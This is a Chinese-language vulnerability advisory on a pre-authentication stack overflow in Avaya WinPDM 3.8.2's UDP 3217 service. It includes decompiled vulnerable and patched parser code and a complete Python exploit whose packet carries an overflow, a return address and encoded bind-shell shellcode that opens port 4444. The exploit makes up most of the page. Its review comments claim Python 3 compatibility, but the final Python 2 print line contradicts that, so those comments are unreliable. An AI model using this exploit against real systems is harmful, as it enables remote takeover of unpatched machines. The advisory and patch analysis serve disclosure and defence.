
Avaya WinPDM 多个缓冲区溢出漏洞

发布日期:2011-05-24
更新日期:2012-10-11

受影响系统:
AVAYA AvayaWinPDM 3.8.2
不受影响系统:
AVAYA AvayaWinPDM 3.8.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 47947

AvayaWinPDM 是用于配置 Avaya IP DECT 电话的应用。AvayaWinPDM 3.8.5 之前版本的 Unite Host Router 服务(UniteHostRouter.exe)在处理发往 UDP 3217 端口的请求时,对 "To:" 字段中的超长字符串未做长度检查,可导致基于栈的缓冲区溢出。触发该漏洞不需要任何认证,远程攻击者可借此在应用的上下文中执行任意代码。3.8.5 版本的修复为解析函数增加了空指针检查和 256 字节的长度上限(见下文反编译对比)。在完成升级之前,应在网络边界限制对 UDP 3217 端口的访问。

<*来源:Abdul-Aziz Hariri
  *>

测试方法:
--------------------------------------------------------------------------------
警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Abysssec Public Exploit
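# more info www.abysssec.com
# Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute
#
# A boundary error in the Unite Host Router service (UniteHostRouter.exe)
# when processing certain requests can be exploited to cause a stack-based buffer
# overflow via an overly long string in the "To:" field sent to UDP port 3217.
#
# NOTE(review): the copy of this script on the page had lost the backslash of
# every "\xHH" escape (it showed "x55x54x50x2fx31" for the "UTP/1" protocol
# string), so the bytes sent were ASCII text rather than the intended payload,
# and the "port = 3217" assignment had been swallowed into a comment, which made
# the sendto() call fail with NameError.  Both are repaired below.  The payload
# is built from bytes literals so the file runs unchanged under Python 2 and
# Python 3; the target host may be passed as the first command-line argument.
"""
Decompiled parser from UniteHostRouter.exe (IDA pseudo-code): the vulnerable
routine first, the 3.8.5 version second.  Only what the pseudo-code itself
shows is described in the comments; the size of the destination buffer a2 and
the caller that hands the request text to this routine are not visible here.

// Copies the token that follows the first '/' of Str, up to the next
// ':', '/', '?' or ' ', into a2 and NUL-terminates it.
//   v2 = first ' ' in Str
//   v3 = first '/' or ' ' in Str (must lie before v2, i.e. it is a '/')
//   v5 = first delimiter after that '/' (must not lie past v2)
signed int __cdecl sub_403160(const char *Str, void *a2)
{
  char *v2;
  char *v3;
  const void *v4;
  char *v5;
  unsigned int v6;
  signed int result;

  v2 = strpbrk(Str, " ");
  v3 = strpbrk(Str, "/ ");
  // None of the strpbrk() results is checked for NULL.  If no delimiter
  // follows the '/', v5 is NULL, "v5 > v2" does not reject it, and
  // v6 = v5 - v4 wraps to a huge unsigned value.
  if ( v3 >= v2 || (v4 = v3 + 1, v5 = strpbrk(v3 + 1, ":/? "), v5 > v2) )
  {
    result = 0;
  }
  else
  {
    v6 = v5 - v4;
    // v6 is taken straight from the request and is never compared with the
    // size of a2: this unbounded copy is the stack-based overflow.
    memcpy(a2, v4, v6); // vulnerable memcpy
    *((_BYTE *)a2 + v6) = 0;
    result = 1;
  }
  return result;
}

// 3.8.5 version: every strpbrk() result is NULL-checked, the same ordering
// constraints are kept, and the token length is capped at 256 bytes.
signed int __cdecl sub_403160_patched(const char *Str, void *a2)
{
  char *v2;
  char *v3;
  const void *v4;
  char *v5;
  unsigned int v6;
  signed int result;

  v2 = strpbrk(Str, " ");
  if ( v2
    && (v3 = strpbrk(Str, "/ ")) != 0
    && v3 < v2
    && (v4 = v3 + 1, (v5 = strpbrk(v3 + 1, ":/? ")) != 0)
    && v5 <= v2
    && (v6 = v5 - v4, (signed int)v6 <= 256) ) // patched by checking <= 256
  {
    // NOTE(review): up to 256 bytes plus the terminating NUL (257 bytes) are
    // still written; whether that fits a2 depends on its size, which the
    // pseudo-code does not show.
    memcpy(a2, v4, v6);
    *((_BYTE *)a2 + v6) = 0;
    result = 1;
  }
  else
  {
    result = 0;
  }
  return result;
}
"""
import sys
from socket import socket, AF_INET, SOCK_DGRAM

# Target: the Unite Host Router service on UDP/3217.  The host can be given on
# the command line; the author's lab address is kept as the default.
hostname = sys.argv[1] if len(sys.argv) > 1 else "192.168.171.129"
port = 3217

# Packet layout.  The "/..." token after the To: address is what the parser
# above copies: 260 filler bytes, then (per the author's annotation) the
# address of a "call esp" in W32_SOCK.dll, then the shellcode.  The trailing
# space is the delimiter strpbrk() stops at, and the filler, the return address
# and the PexAlphaNum-encoded shellcode contain none of ':', '/', '?' or ' ',
# so the whole tail is copied as one token.  The exact buffer size/offset is
# not visible in the pseudo-code; the 256-byte cap in the patch hints at a
# roughly 256-byte buffer, but that is unconfirmed.
data = b"\x55\x54\x50\x2f\x31"  # Protocol: "UTP/1"
data += b" To: 127.0.0.1"
data += b" /" + b"A" * 260
data += b"\xFB\xF8\xAB\x71"  # 71ABF8FB call esp W32_SOCK.dll
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com
data += (b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
         b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
         b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
         b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
         b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
         b"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
         b"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
         b"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
         b"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
         b"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
         b"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
         b"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
         b"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
         b"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
         b"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
         b"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
         b"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
         b"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
         b"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
         b"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
         b"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
         b"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
         b"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
         b"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
         b"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
         b"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
         b"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
         b"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
         b"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
         b"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
         b"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
         b"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
         b"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
         b"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
         b"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
         b"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
         b"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
         b"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
         b"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
         b"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
         b"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
         b"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
         b"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
         b"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
         b"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
data += b" "  # delimiter that ends the copied token

# Only send when run as a script, never on import.
if __name__ == "__main__":
    udp = socket(AF_INET, SOCK_DGRAM)
    try:
        udp.sendto(data, (hostname, port))
    finally:
        udp.close()
    print("Send malicious packet ")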
print "You Should Got a shell at %s 4444" % hostname

建议:
--------------------------------------------------------------------------------
厂商补丁:

AVAYA
-----
目前厂商已经发布了升级补丁(AvayaWinPDM 3.8.5)以修复这个安全问题,请到厂商的主页下载:
http://support.avaya.com/security/